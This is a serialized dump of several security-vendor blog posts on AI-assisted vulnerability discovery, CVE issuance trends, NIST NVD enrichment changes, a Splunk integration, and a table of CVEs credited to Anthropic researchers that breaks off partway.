Anthropic claimed Mythos had already identified thousands of zero-day vulnerabilities across every major operating system and web browser. Rather than releasing the model publicly, they funneled access to a coalition of partners, including AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorgan Chase, the Linux Foundation, Microsoft, NVIDIA, and Palo Alto Networks, plus several other organizations.",[18,3013,3014,3015,3020],{},"The cybersecurity industry's response was a mix of awe, fear, uncertainty, and doubt, which prompted two questions: At what scale is AI-assisted vulnerability discovery real? And at what scale would we see it in the public disclosure of vulnerabilities? That led me to build a list tracking ",[47,3016,3019],{"href":3017,"rel":3018},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fanthropic-glasswing-cves",[51],"Anthropic attributed CVEs",". We are now two Patch Tuesdays past the Glasswing announcement, and the signals are starting to emerge.",[18,3022,3023],{},"To put the results in perspective, I started by looking at the top 20 CVE Numbering Authorities and their CVE issuance volume over the past five years and found clear indications across several projects of the likely impact AI-assisted vulnerability discovery is having on public disclosures of vulnerabilities.",[61,3025,3027],{"id":3026},"cve-issuance-trends-top-software-suppliers","CVE Issuance Trends - Top Software Suppliers",[18,3029,3030],{},[68,3031],{"alt":70,"src":3032},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002F2026-cve-trends.png",[18,3034,3035],{},"Digging in a bit deeper, I decided to look at the top Software Suppliers and their year-over-year growth to better understand what significant changes might be happening. From the chart above we can see some notable increases across Chrome (+563.2%), Mozilla (+156.9%), VMware (+180.9%), Apache (+170.3%), HPE (+132.3%), F5 (+113.8%), among several others. 
In addition to these, GitHub's 476.07% increase highlights accelerated vulnerability disclosure across a high volume of open source projects.",[18,3037,3038],{},"The evidence appears to point to emerging AI models that have enabled software suppliers and security researchers to discover and remediate vulnerabilities that would have likely gone overlooked otherwise.",[61,3040,3042],{"id":3041},"digging-into-noteworthy-software-suppliers-and-open-source-projects","Digging Into Noteworthy Software Suppliers and Open Source Projects",[18,3044,3045],{},"To provide some visibility into the emerging trend of AI-assisted vulnerability discovery, we took a deeper look at several of the software suppliers and open source projects.",[993,3047,3049],{"id":3048},"github-open-source-project","GitHub (Open Source Project)",[18,3051,3052],{},[68,3053],{"alt":3054,"src":3055},"Github","\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fgithub.png",[18,3057,3058],{},"During the same window in which our submission queue was experiencing its AI-driven surge, GitHub was seeing its own surge in vulnerability reports. Both the volume of findings and the corresponding increase in CVE issuance have been confirmed as real by the GitHub team.\n\"No single reporter accounts for more than ~3% of volume, and no single project accounts for more than ~7%. This isn't one person or one tool, it's a systemic shift in how vulnerability reporting is happening across the ecosystem.\" - Madison Oliver Ficorilli.\nSomething in the ecosystem has changed, and the most likely explanation is the greater availability of AI models that are effective at discovering vulnerabilities in open source software. 
It also highlights how open source software appears to serve as a testing ground for AI vulnerability discovery tools and an early indicator of what's to come.",[18,3060,3061,3062],{},"References: ",[47,3063,3064],{"href":3064,"rel":3065},"https:\u002F\u002Fwww.linkedin.com\u002Fpulse\u002Feveryones-blaming-ai-bad-vulnerability-reports-data-oliver-ficorilli-kvoxc\u002F?trackingId=miFeABHjId5tHsdVftUuaA%3D%3D",[51],[993,3067,3069],{"id":3068},"mozilla","Mozilla",[18,3071,3072],{},[68,3073],{"alt":3069,"src":3074},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Ffirefox.png",[18,3076,3077],{},"Mozilla has been one of the more vocal and transparent projects when it comes to AI-assisted vulnerability discovery, and is a participant in Project Glasswing. The Mozilla team stated, \"Since February, the Firefox team has been working around the clock using frontier AI models to find and fix latent security vulnerabilities in the browser.\" They also highlighted their participation in Anthropic's Mythos preview: \"As part of our continued collaboration with Anthropic, we had the opportunity to apply an early version of Claude Mythos Preview to 
Firefox.\"",[18,3079,3080],{},"References:",[22,3082,3083,3089,3095],{},[25,3084,3085],{},[47,3086,3087],{"href":3087,"rel":3088},"https:\u002F\u002Fblog.mozilla.org\u002Fen\u002Fprivacy-security\u002Fai-security-zero-day-vulnerabilities\u002F",[51],[25,3090,3091],{},[47,3092,3093],{"href":3093,"rel":3094},"https:\u002F\u002Fblog.mozilla.org\u002Fen\u002Ffirefox\u002Fhardening-firefox-anthropic-red-team\u002F",[51],[25,3096,3097],{},[47,3098,3101],{"href":3099,"rel":3100},"https:\u002F\u002Fhacks.mozilla.org\u002F2026\u002F05\u002Fbehind-the-scenes-hardening-firefox\u002F%3E",[51],"https:\u002F\u002Fhacks.mozilla.org\u002F2026\u002F05\u002Fbehind-the-scenes-hardening-firefox\u002F>",[993,3103,3105],{"id":3104},"chrome","Chrome",[18,3107,3108],{},[68,3109],{"alt":3105,"src":3110},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fchrome.png",[18,3112,3113],{},"Chrome experienced a 563% increase in CVE disclosures, one of the most significant upticks we observed, and Google has confirmed its participation in Project Glasswing.",[18,3115,3116],{},"While we haven't seen concrete confirmation of what tools were used to drive the sudden increase, we suspect it's related to AI discovery tools, likely some combination of Mythos and Google's own AI models. 
The trend points toward AI-assisted discovery as the most likely driver.",[18,3118,3119],{},"Additionally, Google's Threat Intelligence Group recently published an article on adversaries leveraging AI for vulnerability exploitation, highlighting that the use of new tools isn't limited to the defender side.",[18,3121,3061,3122],{},[47,3123,3124],{"href":3124,"rel":3125},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fai-vulnerability-exploitation-initial-access",[51],[993,3127,3129],{"id":3128},"microsoft","Microsoft",[18,3131,3132],{},[68,3133],{"alt":3129,"src":3134},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fmicrosoft.png",[18,3136,3137],{},"Microsoft is a participant in Project Glasswing and has also announced the launch of its own AI discovery tool, clear evidence that AI is making an impact on CVE disclosures. As Microsoft noted, \"The findings in this Patch Tuesday and the retrospective recall on five years of CLFS MSRC cases are evidence that AI vulnerability findings can scale.\"",[18,3139,3140],{},"This suggests we're likely just at the beginning of higher volumes of CVE disclosures across Microsoft products. It will be interesting to see how far Microsoft's CVE issuance scales over the coming months.",[18,3142,3061,3143],{},[47,3144,3145],{"href":3145,"rel":3146},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F05\u002F12\u002Fdefense-at-ai-speed-microsofts-new-multi-model-agentic-security-system-tops-leading-industry-benchmark\u002F",[51],[993,3148,3149],{"id":1865},"Apache",[18,3151,3152],{},[68,3153],{"alt":3149,"src":3154},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fapache.png",[18,3156,3157],{},"Apache is a participant in Project Glasswing and is experiencing a 170%+ increase in CVEs published. 
As Anthropic stated, \"we've donated $1.5M to the Apache Software Foundation to enable the maintainers of open-source software to respond to this changing landscape.\"\nWe thought it would be worthwhile to provide some examples of security researchers using AI tools to assist in their discovery work.\nActiveMQ CVE-2026-34197 was discovered by Naveen Sunkavally with the assistance of Claude and is now known to be exploited in the wild and recently landed on CISA KEV.",[18,3159,3160],{},"In his words:\n\"These days I always use Claude to take a first pass at source code for vulnerability hunting. I prompt it lightly and set up a target on the network for it to validate findings. A lot of the time, Claude finds interesting stuff but it doesn't quite rise to the level of a CVE I'd bother reporting. In this case, it did a great job, with nothing more than a couple of basic prompts. This was 80% Claude with 20% gift-wrapping by a human.\" - Naveen Sunkavally.",[18,3162,3061,3163],{},[47,3164,3165],{"href":3165,"rel":3166},"https:\u002F\u002Fhorizon3.ai\u002Fattack-research\u002Fdisclosures\u002Fcve-2026-34197-activemq-rce-jolokia\u002F",[51],[61,3168,3170],{"id":3169},"other-observations-in-ai-assisted-vulnerability-discovery","Other Observations in AI-Assisted Vulnerability Discovery",[993,3172,3173],{"id":1557},"Curl",[18,3175,3176],{},"While Curl didn't make our chart for CVE growth (we excluded lower-volume CVE software suppliers), it remains one of the most heavily audited and fuzzed code bases in existence.",[18,3178,3179],{},"Daniel Stenberg, who maintains Curl, offers a grounded perspective: of the five \"confirmed\" vulnerabilities Mythos initially reported, only one held up as a valid CVE after his security team's review, with the rest being false positives or non-security bugs. 
He also emphasizes that running multiple AI models over time continues to uncover different bugs and vulnerabilities, and notes that previous AI tools have already driven hundreds of bugfixes in curl. Daniel's blog is well worth the read.",[18,3181,3061,3182],{},[47,3183,3184],{"href":3184,"rel":3185},"https:\u002F\u002Fdaniel.haxx.se\u002Fblog\u002F2026\u002F05\u002F11\u002Fmythos-finds-a-curl-vulnerability\u002F",[51],[993,3187,3189],{"id":3188},"palo-alto","Palo Alto",[18,3191,3192],{},"While Palo Alto didn't make the charts due to lower overall CVE issuance, they've seen a 37% increase in CVE issuance year to date and have been very vocal recently about their use of frontier models.\n\"For over a month, we've been using the latest frontier AI models, including Anthropic's Mythos and Claude Opus 4.7 and OpenAI's GPT-5.5-Cyber as part of the Trusted Access for Cyber program. Our teams have worked tirelessly to learn how to fully leverage the immense power of these models, and to find and fix any vulnerabilities as quickly as possible.\" - Rich Campagna, SVP Palo Alto Networks.",[18,3194,3080],{},[22,3196,3197,3203],{},[25,3198,3199],{},[47,3200,3201],{"href":3201,"rel":3202},"https:\u002F\u002Fwww.paloaltonetworks.com\u002Fblog\u002F2026\u002F05\u002Fdefenders-guide-frontier-ai-impact-cybersecurity-may-2026-update\u002F",[51],[25,3204,3205],{},[47,3206,3207],{"href":3207,"rel":3208},"https:\u002F\u002Fwww.linkedin.com\u002Ffeed\u002Fupdate\u002Furn:li:activity:7460374274588061696\u002F?utm_source=share&utm_medium=member_desktop&rcm=ACoAAADShEQBPA7bU2zaIIHMTqDWMnEOq7PYu7g",[51],[61,3210,3212],{"id":3211},"a-bit-of-a-reality-check-for-defenders","A Bit of a Reality Check for Defenders",[18,3214,3215],{},"Vulnerability volumes are clearly trending up, with a short-term spike in public disclosures tied to AI-assisted discovery. 
What's less clear is whether these volumes will be sustained, or whether this is a temporary surge as better AI models are pointed at different code bases and new models continue to surface vulnerabilities.\nMost defenders are starting to see the initial impact of AI-assisted vulnerabilities in their backlogs and should plan for sustained volumes over time. That reinforces the importance of patching early and often, updating to the latest version when possible, and using threat intelligence to prioritize emerging threats that are being actively exploited or likely to be.",[61,3217,202],{"id":201},[18,3219,205],{},[18,3221,208],{},[18,3223,211,3224,217],{},[47,3225,216],{"href":214,"rel":3226},[51],{"title":219,"searchDepth":220,"depth":220,"links":3228},[3229,3230,3237,3241,3242],{"id":3026,"depth":220,"text":3027},{"id":3041,"depth":220,"text":3042,"children":3231},[3232,3233,3234,3235,3236],{"id":3048,"depth":1266,"text":3049},{"id":3068,"depth":1266,"text":3069},{"id":3104,"depth":1266,"text":3105},{"id":3128,"depth":1266,"text":3129},{"id":1865,"depth":1266,"text":3149},{"id":3169,"depth":220,"text":3170,"children":3238},[3239,3240],{"id":1557,"depth":1266,"text":3173},{"id":3188,"depth":1266,"text":3189},{"id":3211,"depth":220,"text":3212},{"id":201,"depth":220,"text":202},"2026-05-14",{"slug":3245},"ai-assisted-vulnerability-discovery","\u002Fblog\u002Fai-assisted-vulnerability-discovery",{"title":1225,"description":233},"blog\u002Fai-assisted-vulnerability-discovery",[242,243],"7S42f6Fund_DgiFL3z5yfMnamwsTuys4oNqSOc6_GoQ",{"id":3252,"title":3253,"articles":7,"authors":3254,"body":3260,"date":3349,"description":3350,"extension":234,"image":3351,"link":7,"meta":3352,"navigation":237,"path":3353,"seo":3354,"series":7,"stem":3357,"subtype":7,"tags":3358,"__hash__":3360},"blog\u002Fblog\u002Fvulncheck-exploit-intelligence-app-in-splunkbase.md","Learn How to Operationalize Exploit Intelligence in Splunk with VulnCheck’s New Splunkbase 
App",[3255],{"name":3256,"avatar":3257,"link":3258,"linkName":3259},"Kimber Duke","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U07E4RTU9PA-fa22b26ad3c8-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fkimberduke\u002F","Kimber on LinkedIn",{"type":15,"value":3261,"toc":3344},[3262,3265,3268,3272,3275,3278,3316,3320,3323,3326,3330,3337],[18,3263,3264],{},"We’re excited to announce that the VulnCheck Exploit Intelligence App is now available in the Splunkbase Marketplace. This new integration brings real-world exploit and vulnerability intelligence directly into Splunk, making it easier for security teams to enrich CVE data, prioritize remediation and respond faster to emerging threats.",[18,3266,3267],{},"For teams already using Splunk to centralize investigation and response, this integration is a meaningful step forward in supporting the entire exploitation lifecycle. Static CVSS scores and basic vulnerability metadata do not provide defenders with the necessary context to act quickly. This includes whether a vulnerability is tied to active exploitation, associated with known threat activity or relevant to software running in their environment. The result is too much time spent sorting noise and not enough time focusing on the issues that matter most.",[61,3269,3271],{"id":3270},"what-vulncheck-brings-to-splunk","What VulnCheck Brings to Splunk",[18,3273,3274],{},"By integrating VulnCheck’s APIs directly into Splunk, security teams gain inventory or SBOM-driven risk analytics, threat actor correlation and enriched vulnerability insights within the workflows they already rely on. 
This means faster analysis, improved prioritization and more informed remediation decisions based on actual risk instead of theoretical severity alone.",[18,3276,3277],{},"The VulnCheck Exploit Intelligence App enables Splunk users to operationalize these insights at scale through:",[22,3279,3280,3286,3292,3298,3304,3310],{},[25,3281,3282,3285],{},[295,3283,3284],{},"CVE Enrichment Engine"," for deeper CVE enrichment with VulnCheck exploitation intelligence",[25,3287,3288,3291],{},[295,3289,3290],{},"SBOM Risk Analysis"," for uploading and analyzing SPDX or CycloneDX SBOM files",[25,3293,3294,3297],{},[295,3295,3296],{},"Interactive Dashboards"," including executive overviews, CVE exploration, SBOM risk analysis and reporting",[25,3299,3300,3303],{},[295,3301,3302],{},"Custom Visualizations"," such as vulnerability priority pyramids, exploitation timelines and threat intelligence displays",[25,3305,3306,3309],{},[295,3307,3308],{},"Notable Event Integration"," for automatic enrichment of Splunk ES notable events with CVE intelligence",[25,3311,3312,3315],{},[295,3313,3314],{},"Adaptive Response Actions"," that enrich IP addresses and CVEs from notable events with VulnCheck intelligence data",[61,3317,3319],{"id":3318},"the-impact","The Impact",[18,3321,3322],{},"The VulnCheck Exploit Intelligence App allows security teams to bring real-world exploit context directly into their daily operations and spend less time pivoting across tools and more time acting on the vulnerabilities that represent real exposure. This ability to speed remediation matters even more at scale.",[18,3324,3325],{},"VulnCheck collects data from nearly 600 sources and more than 500 million records across all CVEs and vulnerabilities without a CVE. 
These data sources are curated and delivered in machine-readable formats, giving security teams the most relevant intelligence they can act on quickly in the systems they already depend on.",[61,3327,3329],{"id":3328},"get-started-on-splunkbase-today","Get Started on Splunkbase Today",[18,3331,3332,3333,59],{},"The VulnCheck Exploit Intelligence App is available now in the Splunkbase Marketplace. For organizations using Splunk to investigate threats, manage exposures, and drive response, the app makes it easier to bring exploit-aware vulnerability intelligence directly into existing security workflows. To download, please visit: ",[47,3334,3335],{"href":3335,"rel":3336},"https:\u002F\u002Fsplunkbase.splunk.com\u002Fapp\u002F8225",[51],[18,3338,3339,3340],{},"For documentation on integrating VulnCheck intelligence into Splunk please visit: ",[47,3341,3342],{"href":3342,"rel":3343},"https:\u002F\u002Fdocs.vulncheck.com\u002Fintegrations\u002Fsplunk",[51],{"title":219,"searchDepth":220,"depth":220,"links":3345},[3346,3347,3348],{"id":3270,"depth":220,"text":3271},{"id":3318,"depth":220,"text":3319},{"id":3328,"depth":220,"text":3329},"2026-04-20T09:00:00-05:00","Bring real-world exploit and vulnerability intelligence directly into Splunk, making it easier for security teams to enrich CVE data, prioritize remediation and respond faster to emerging threats.","\u002Fblog\u002Fvc-splunkbase-1200x630.png",{},"\u002Fblog\u002Fvulncheck-exploit-intelligence-app-in-splunkbase",{"title":3355,"description":3356},"VulnCheck Insights: CVE Context at the Hover of Your Cursor","Instead of bouncing between tabs, you now get instant, current context the moment a CVE appears on your 
screen.","blog\u002Fvulncheck-exploit-intelligence-app-in-splunkbase",[3359],"Integrations","TgT0BFsyyuTkuEbYiVmSmP4JApL_OEp2alRM39l7bpw",{"id":3362,"title":3363,"articles":7,"authors":3364,"body":3366,"date":3465,"description":3466,"extension":234,"image":7,"link":7,"meta":3467,"navigation":237,"path":3469,"seo":3470,"series":7,"stem":3471,"subtype":7,"tags":3472,"__hash__":3474},"blog\u002Fblog\u002Fexpanding-vulnerability-enrichment.md","VulnCheck’s Commitment to Expanding Access to Vulnerability Enrichment",[3365],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":3367,"toc":3459},[3368,3374,3377,3380,3391,3394,3397,3401,3404,3415,3418,3421,3428,3432,3435,3441,3445,3448,3450,3452,3454],[18,3369,3370],{},[68,3371],{"alt":3372,"src":3373},"VulnCheck Serving Everyone","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-nist.png",[18,3375,3376],{},"We've heard concerns about National Institute of Standards and Technology (NIST) NVD's announcement this week clarifying their focus will now be much more limited moving forward.",[18,3378,3379],{},"Starting on April 15, 2026, NIST will prioritize the following CVEs for enrichment:",[22,3381,3382,3385,3388],{},[25,3383,3384],{},"CVEs appearing in CISA’s Known Exploited Vulnerabilities (KEV) Catalog",[25,3386,3387],{},"CVEs for software used within the US federal government",[25,3389,3390],{},"CVEs for critical software as defined by Executive Order 14028",[18,3392,3393],{},"What this means is that there will be a significant volume of CVEs that will not be enriched by NIST. 
This news comes after over two years of degradation in the NIST NVD enrichment services that started in 2024 after a reduction in funding.",[18,3395,3396],{},"While we appreciate NIST’s transparency in communicating how they will prioritize and resource enrichment moving forward, this will continue to exacerbate the data gap that NIST NVD has left across CVE records, impacting CPE, CWE and CVSS coverage over the past two years, which creates negative security outcomes for organizations in the United States and globally.",[61,3398,3400],{"id":3399},"vulnchecks-commitment-to-the-community","VulnCheck's Commitment to The Community",[18,3402,3403],{},"In response to NIST NVD’s resource constraints in 2024, VulnCheck launched NVD++ on March 13, 2024, a free Community-accessible service providing:",[22,3405,3406,3409,3412],{},[25,3407,3408],{},"Timely access to NIST NVD data (no 503 Service Unavailables)",[25,3410,3411],{},"NIST NVD 1.0 compliant downloads (no longer supported by NIST)",[25,3413,3414],{},"Substantially expanded CPE coverage",[18,3416,3417],{},"Additionally, VulnCheck’s Exploit & Vulnerability Intelligence commercially-available product already provides broad coverage for CVSS, CVSS-BT, & CPE lookup. 
One of the measures we took proactively in the past was to add CVSS scores from several vendor advisories to provide near complete coverage in our commercial offering.",[18,3419,3420],{},"Thousands of organizations have already adopted VulnCheck NVD++ since we launched the service, in addition to our other community offerings including VulnCheck KEV, VulnCheck XDB, and the Report a Vulnerability Service.",[18,3422,3423,3424],{},"Anyone can access VulnCheck NVD++ as part of VulnCheck Community for free today at: ",[47,3425,3426],{"href":3426,"rel":3427},"https:\u002F\u002Fwww.vulncheck.com\u002Fnvd2",[51],[61,3429,3431],{"id":3430},"vulncheck-automated-cpe-generation","VulnCheck Automated CPE Generation",[18,3433,3434],{},"VulnCheck continues to outperform NIST NVD CPE enrichment in both volume of CVEs and speed. This chart shows VulnCheck CPE generation vs. NIST NVD over the past year. We remain committed to continuing to expand coverage.",[18,3436,3437],{},[68,3438],{"alt":3439,"src":3440},"VulnCheck CPE vs. 
NIST NVD","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-cpe.png",[61,3442,3444],{"id":3443},"expanding-nvd-enrichment-moving-forward","Expanding NVD++ Enrichment Moving Forward",[18,3446,3447],{},"VulnCheck will expand our NVD++ community and commercial enrichments over the next month to add CVSS scores to CVE records to provide timely and near complete CVSS coverage.",[61,3449,202],{"id":201},[18,3451,205],{},[18,3453,208],{},[18,3455,211,3456,217],{},[47,3457,216],{"href":214,"rel":3458},[51],{"title":219,"searchDepth":220,"depth":220,"links":3460},[3461,3462,3463,3464],{"id":3399,"depth":220,"text":3400},{"id":3430,"depth":220,"text":3431},{"id":3443,"depth":220,"text":3444},{"id":201,"depth":220,"text":202},"2026-04-16T10:00:00-05:00","In response to NIST NVD's announcement that it will significantly limit CVE enrichment starting April 15, 2026, VulnCheck reaffirms its commitment to filling the data gap through its free NVD++ community service and plans to expand coverage with CVSS scores over the next month",{"slug":3468},"expanding-vulnerability-enrichment","\u002Fblog\u002Fexpanding-vulnerability-enrichment",{"title":3363,"description":3466},"blog\u002Fexpanding-vulnerability-enrichment",[242,3473],"nist-nvd","8cA4uhkARDZHCuGktrt-I7sRkQyskN5ZAowKo_6oFWU",{"id":3476,"title":3477,"articles":3478,"authors":3511,"body":3513,"date":4396,"description":4397,"extension":234,"image":7,"link":7,"meta":4398,"navigation":237,"path":4400,"seo":4401,"series":7,"stem":4402,"subtype":7,"tags":4403,"__hash__":4404},"blog\u002Fblog\u002Fanthropic-glasswing-cves.md","Tracking CVEs Attributed to Anthropic Researchers and Project Glasswing",[3479,3484,3489,3493,3498,3503,3506],{"title":3480,"source":3481,"link":3482,"date":3483},"Nobody knows how many CVEs Anthropic's Project Glasswing has actually found","The 
Register","https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F15\u002Fproject_glasswing_cves\u002F","2026-04-15",{"title":3485,"source":3486,"link":3487,"date":3488},"Behind the Mythos hype, Glasswing has just one confirmed CVE","CSO","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4159617\u002Fbehind-the-mythos-hype-glasswing-has-just-one-confirmed-cve.html","2026-04-16",{"title":3490,"source":3491,"link":3492,"date":3488},"“Developers are not engineers:” Why Anthropic’s Mythos and other AI tools expose gaps in vulnerability reporting","Cybernews","https:\u002F\u002Fcybernews.com\u002Fai-news\u002Fanthropic-mythos-ai-vulnerability-reporting-cve-disclosure\u002F",{"title":3494,"source":3495,"link":3496,"date":3497},"Risky Biz Newsletter","Risky Biz","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-nist-gives-up-enriching-most-cves\u002F","2026-04-17",{"title":3499,"source":3500,"link":3501,"date":3502},"A tsunami of flaws: When frontier AI and Patch Tuesday collide","ComputerWeekly","https:\u002F\u002Fwww.computerweekly.com\u002Fnews\u002F366641789\u002FA-tsunami-of-flaws-When-frontier-AI-and-Patch-Tuesday-collide","2026-04-22",{"title":3504,"source":3481,"link":3505,"date":3502},"Anthropic's super-scary bug hunting model Mythos is shaping up to be a nothingburger","https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F22\u002Fanthropic_mythos_hype_nothingburger\u002F",{"title":3507,"source":3508,"link":3509,"date":3510},"Resilient Cyber Newsletter #94","Resilient Cyber","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fresilient-cyber-newsletter-94","2026-04-24",[3512],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":3514,"toc":4387},[3515,3518,3521,3535,3538,3542,3557,3561,3564,3567,3570,3573,3651,3655,3661,4310,4313,4350,4354,4357,4360,4363,4369,4373,4376,4378,4380,4382],[18,3516,3517],{},"Anthropic's Project Glasswing has generated significant attention—but very little concrete data. 
One question keeps coming up: what exactly did it find, disclose, and receive CVEs for? We've fielded this question repeatedly, so I did the work of tracking down publicly disclosed CVEs credited to the Anthropic research team at this time.",[61,3519,20],{"id":3520},"key-takeaways",[22,3522,3523,3526,3529,3532],{},[25,3524,3525],{},"75 CVEs mention “Anthropic”",[25,3527,3528],{},"40 are actually credited to Anthropic researchers",[25,3530,3531],{},"Only 1 is explicitly attributed to Glasswing",[25,3533,3534],{},"10 are from external collaboration programs (Calif.io \u002F MADBugs)",[18,3536,3537],{},"Taken together, this suggests that while Anthropic researchers are actively contributing to vulnerability discovery and appears to be promising, the publicly attributable impact of Glasswing itself remains limited so far.",[61,3539,3541],{"id":3540},"methodology","Methodology",[18,3543,3544,3545,3550,3551,3556],{},"I started by re-reading the ",[47,3546,3549],{"href":3547,"rel":3548},"https:\u002F\u002Fwww.anthropic.com\u002Fglasswing",[51],"Glasswing report"," and the advisories published at ",[47,3552,3555],{"href":3553,"rel":3554},"https:\u002F\u002Fred.anthropic.com\u002F",[51],"red.anthropic.com",". Neither source provides a comprehensive CVE list of vulnerabilities discovered by Anthropic. So I decided to search the full CVE record database, and searched every CVE record containing the term \"anthropic\" and reviewed each one.",[61,3558,3560],{"id":3559},"what-disclosed-vulnerabilities-have-been-credited-to-the-anthropic-research-team","What Disclosed Vulnerabilities Have Been Credited to the Anthropic Research Team?",[18,3562,3563],{},"75 CVE records contain the term \"Anthropic.\" Of those, 40 are credited to Anthropic or Anthropic-affiliated researchers in the credits field. 
The remaining 35 are CVEs affecting Anthropic tools like Claude Code, MCP Inspector, and third party integrations which are out of scope for this analysis..",[18,3565,3566],{},"Searching the credits field for \"Anthropic\" is one way to explore this question today, though the credits vary. The 40 break down across three distinct credit attributions: the core Anthropic research team, Nicholas Carlini individually, and Calif.io, an independent security research firm running a program called MADBugs (Month of AI-Discovered Bugs) that credits their work jointly as \"Calif.io in collaboration with Claude and Anthropic Research.\" The 9 wolfSSL CVEs and the NGINX CVE all fall into that third category.",[18,3568,3569],{},"CVE credits are not standardized and depend on how individual CNAs populate the field, meaning attribution is incomplete and sometimes inconsistent.",[18,3571,3572],{},"Here is the breakdown by vendor:",[307,3574,3575,3588],{},[310,3576,3577],{},[313,3578,3579,3582,3585],{},[316,3580,3581],{},"Vendor",[316,3583,3584],{},"Product",[316,3586,3587],{},"# of CVEs",[336,3589,3590,3600,3609,3619,3628,3637],{},[313,3591,3592,3594,3597],{},[341,3593,3069],{},[341,3595,3596],{},"Firefox",[341,3598,3599],{},"28",[313,3601,3602,3605,3607],{},[341,3603,3604],{},"wolfSSL",[341,3606,3604],{},[341,3608,723],{},[313,3610,3611,3614,3617],{},[341,3612,3613],{},"F5",[341,3615,3616],{},"NGINX Plus",[341,3618,467],{},[313,3620,3621,3624,3626],{},[341,3622,3623],{},"FreeBSD",[341,3625,3623],{},[341,3627,467],{},[313,3629,3630,3633,3635],{},[341,3631,3632],{},"OpenSSL",[341,3634,3632],{},[341,3636,467],{},[313,3638,3639,3644,3646],{},[341,3640,3641],{},[295,3642,3643],{},"Total",[341,3645],{},[341,3647,3648],{},[295,3649,3650],{},"40",[61,3652,3654],{"id":3653},"the-list-of-40-cves-attributed-to-anthropic","The List of 40 CVEs Attributed to Anthropic",[18,3656,3657,3658],{},"The Latest Updated List is Here: 
",[47,3659,49],{"href":49,"rel":3660},[51],[307,3662,3663,3683],{},[310,3664,3665],{},[313,3666,3667,3670,3673,3675,3677,3680],{},[316,3668,3669],{},"CVE Number",[316,3671,3672],{},"Date Published",[316,3674,3581],{},[316,3676,3584],{},[316,3678,3679],{},"CVSS",[316,3681,3682],{},"Credit",[336,3684,3685,3703,3718,3733,3748,3764,3779,3794,3809,3824,3839,3854,3869,3884,3899,3914,3929,3944,3959,3974,3989,4005,4020,4036,4052,4067,4083,4098,4114,4131,4148,4165,4183,4199,4215,4231,4248,4263,4278,4294],{},[313,3686,3687,3690,3693,3695,3697,3700],{},[341,3688,3689],{},"CVE-2026-2763",[341,3691,3692],{},"2026-02-24",[341,3694,3069],{},[341,3696,3596],{},[341,3698,3699],{},"9.8",[341,3701,3702],{},"Evyatar Ben Asher, Keane Lucas, Nicholas Carlini, Newton Cheng, Daniel Freeman, Alex Gaynor, and Joel Weinberger using Claude from Anthropic",[313,3704,3705,3708,3710,3712,3714,3716],{},[341,3706,3707],{},"CVE-2026-2764",[341,3709,3692],{},[341,3711,3069],{},[341,3713,3596],{},[341,3715,3699],{},[341,3717,3702],{},[313,3719,3720,3723,3725,3727,3729,3731],{},[341,3721,3722],{},"CVE-2026-2765",[341,3724,3692],{},[341,3726,3069],{},[341,3728,3596],{},[341,3730,3699],{},[341,3732,3702],{},[313,3734,3735,3738,3740,3742,3744,3746],{},[341,3736,3737],{},"CVE-2026-2766",[341,3739,3692],{},[341,3741,3069],{},[341,3743,3596],{},[341,3745,3699],{},[341,3747,3702],{},[313,3749,3750,3753,3755,3757,3759,3762],{},[341,3751,3752],{},"CVE-2026-2769",[341,3754,3692],{},[341,3756,3069],{},[341,3758,3596],{},[341,3760,3761],{},"8.8",[341,3763,3702],{},[313,3765,3766,3769,3771,3773,3775,3777],{},[341,3767,3768],{},"CVE-2026-2770",[341,3770,3692],{},[341,3772,3069],{},[341,3774,3596],{},[341,3776,3761],{},[341,3778,3702],{},[313,3780,3781,3784,3786,3788,3790,3792],{},[341,3782,3783],{},"CVE-2026-2771",[341,3785,3692],{},[341,3787,3069],{},[341,3789,3596],{},[341,3791,3699],{},[341,3793,3702],{},[313,3795,3796,3799,3801,3803,3805,3807],{},[341,3797,3798],{},"CVE-2026-2772",[341,3800,3692],{},[341,3802,30
69],{},[341,3804,3596],{},[341,3806,3761],{},[341,3808,3702],{},[313,3810,3811,3814,3816,3818,3820,3822],{},[341,3812,3813],{},"CVE-2026-2773",[341,3815,3692],{},[341,3817,3069],{},[341,3819,3596],{},[341,3821,3699],{},[341,3823,3702],{},[313,3825,3826,3829,3831,3833,3835,3837],{},[341,3827,3828],{},"CVE-2026-2774",[341,3830,3692],{},[341,3832,3069],{},[341,3834,3596],{},[341,3836,3761],{},[341,3838,3702],{},[313,3840,3841,3844,3846,3848,3850,3852],{},[341,3842,3843],{},"CVE-2026-2775",[341,3845,3692],{},[341,3847,3069],{},[341,3849,3596],{},[341,3851,3699],{},[341,3853,3702],{},[313,3855,3856,3859,3861,3863,3865,3867],{},[341,3857,3858],{},"CVE-2026-2785",[341,3860,3692],{},[341,3862,3069],{},[341,3864,3596],{},[341,3866,3761],{},[341,3868,3702],{},[313,3870,3871,3874,3876,3878,3880,3882],{},[341,3872,3873],{},"CVE-2026-2786",[341,3875,3692],{},[341,3877,3069],{},[341,3879,3596],{},[341,3881,3761],{},[341,3883,3702],{},[313,3885,3886,3889,3891,3893,3895,3897],{},[341,3887,3888],{},"CVE-2026-2787",[341,3890,3692],{},[341,3892,3069],{},[341,3894,3596],{},[341,3896,3761],{},[341,3898,3702],{},[313,3900,3901,3904,3906,3908,3910,3912],{},[341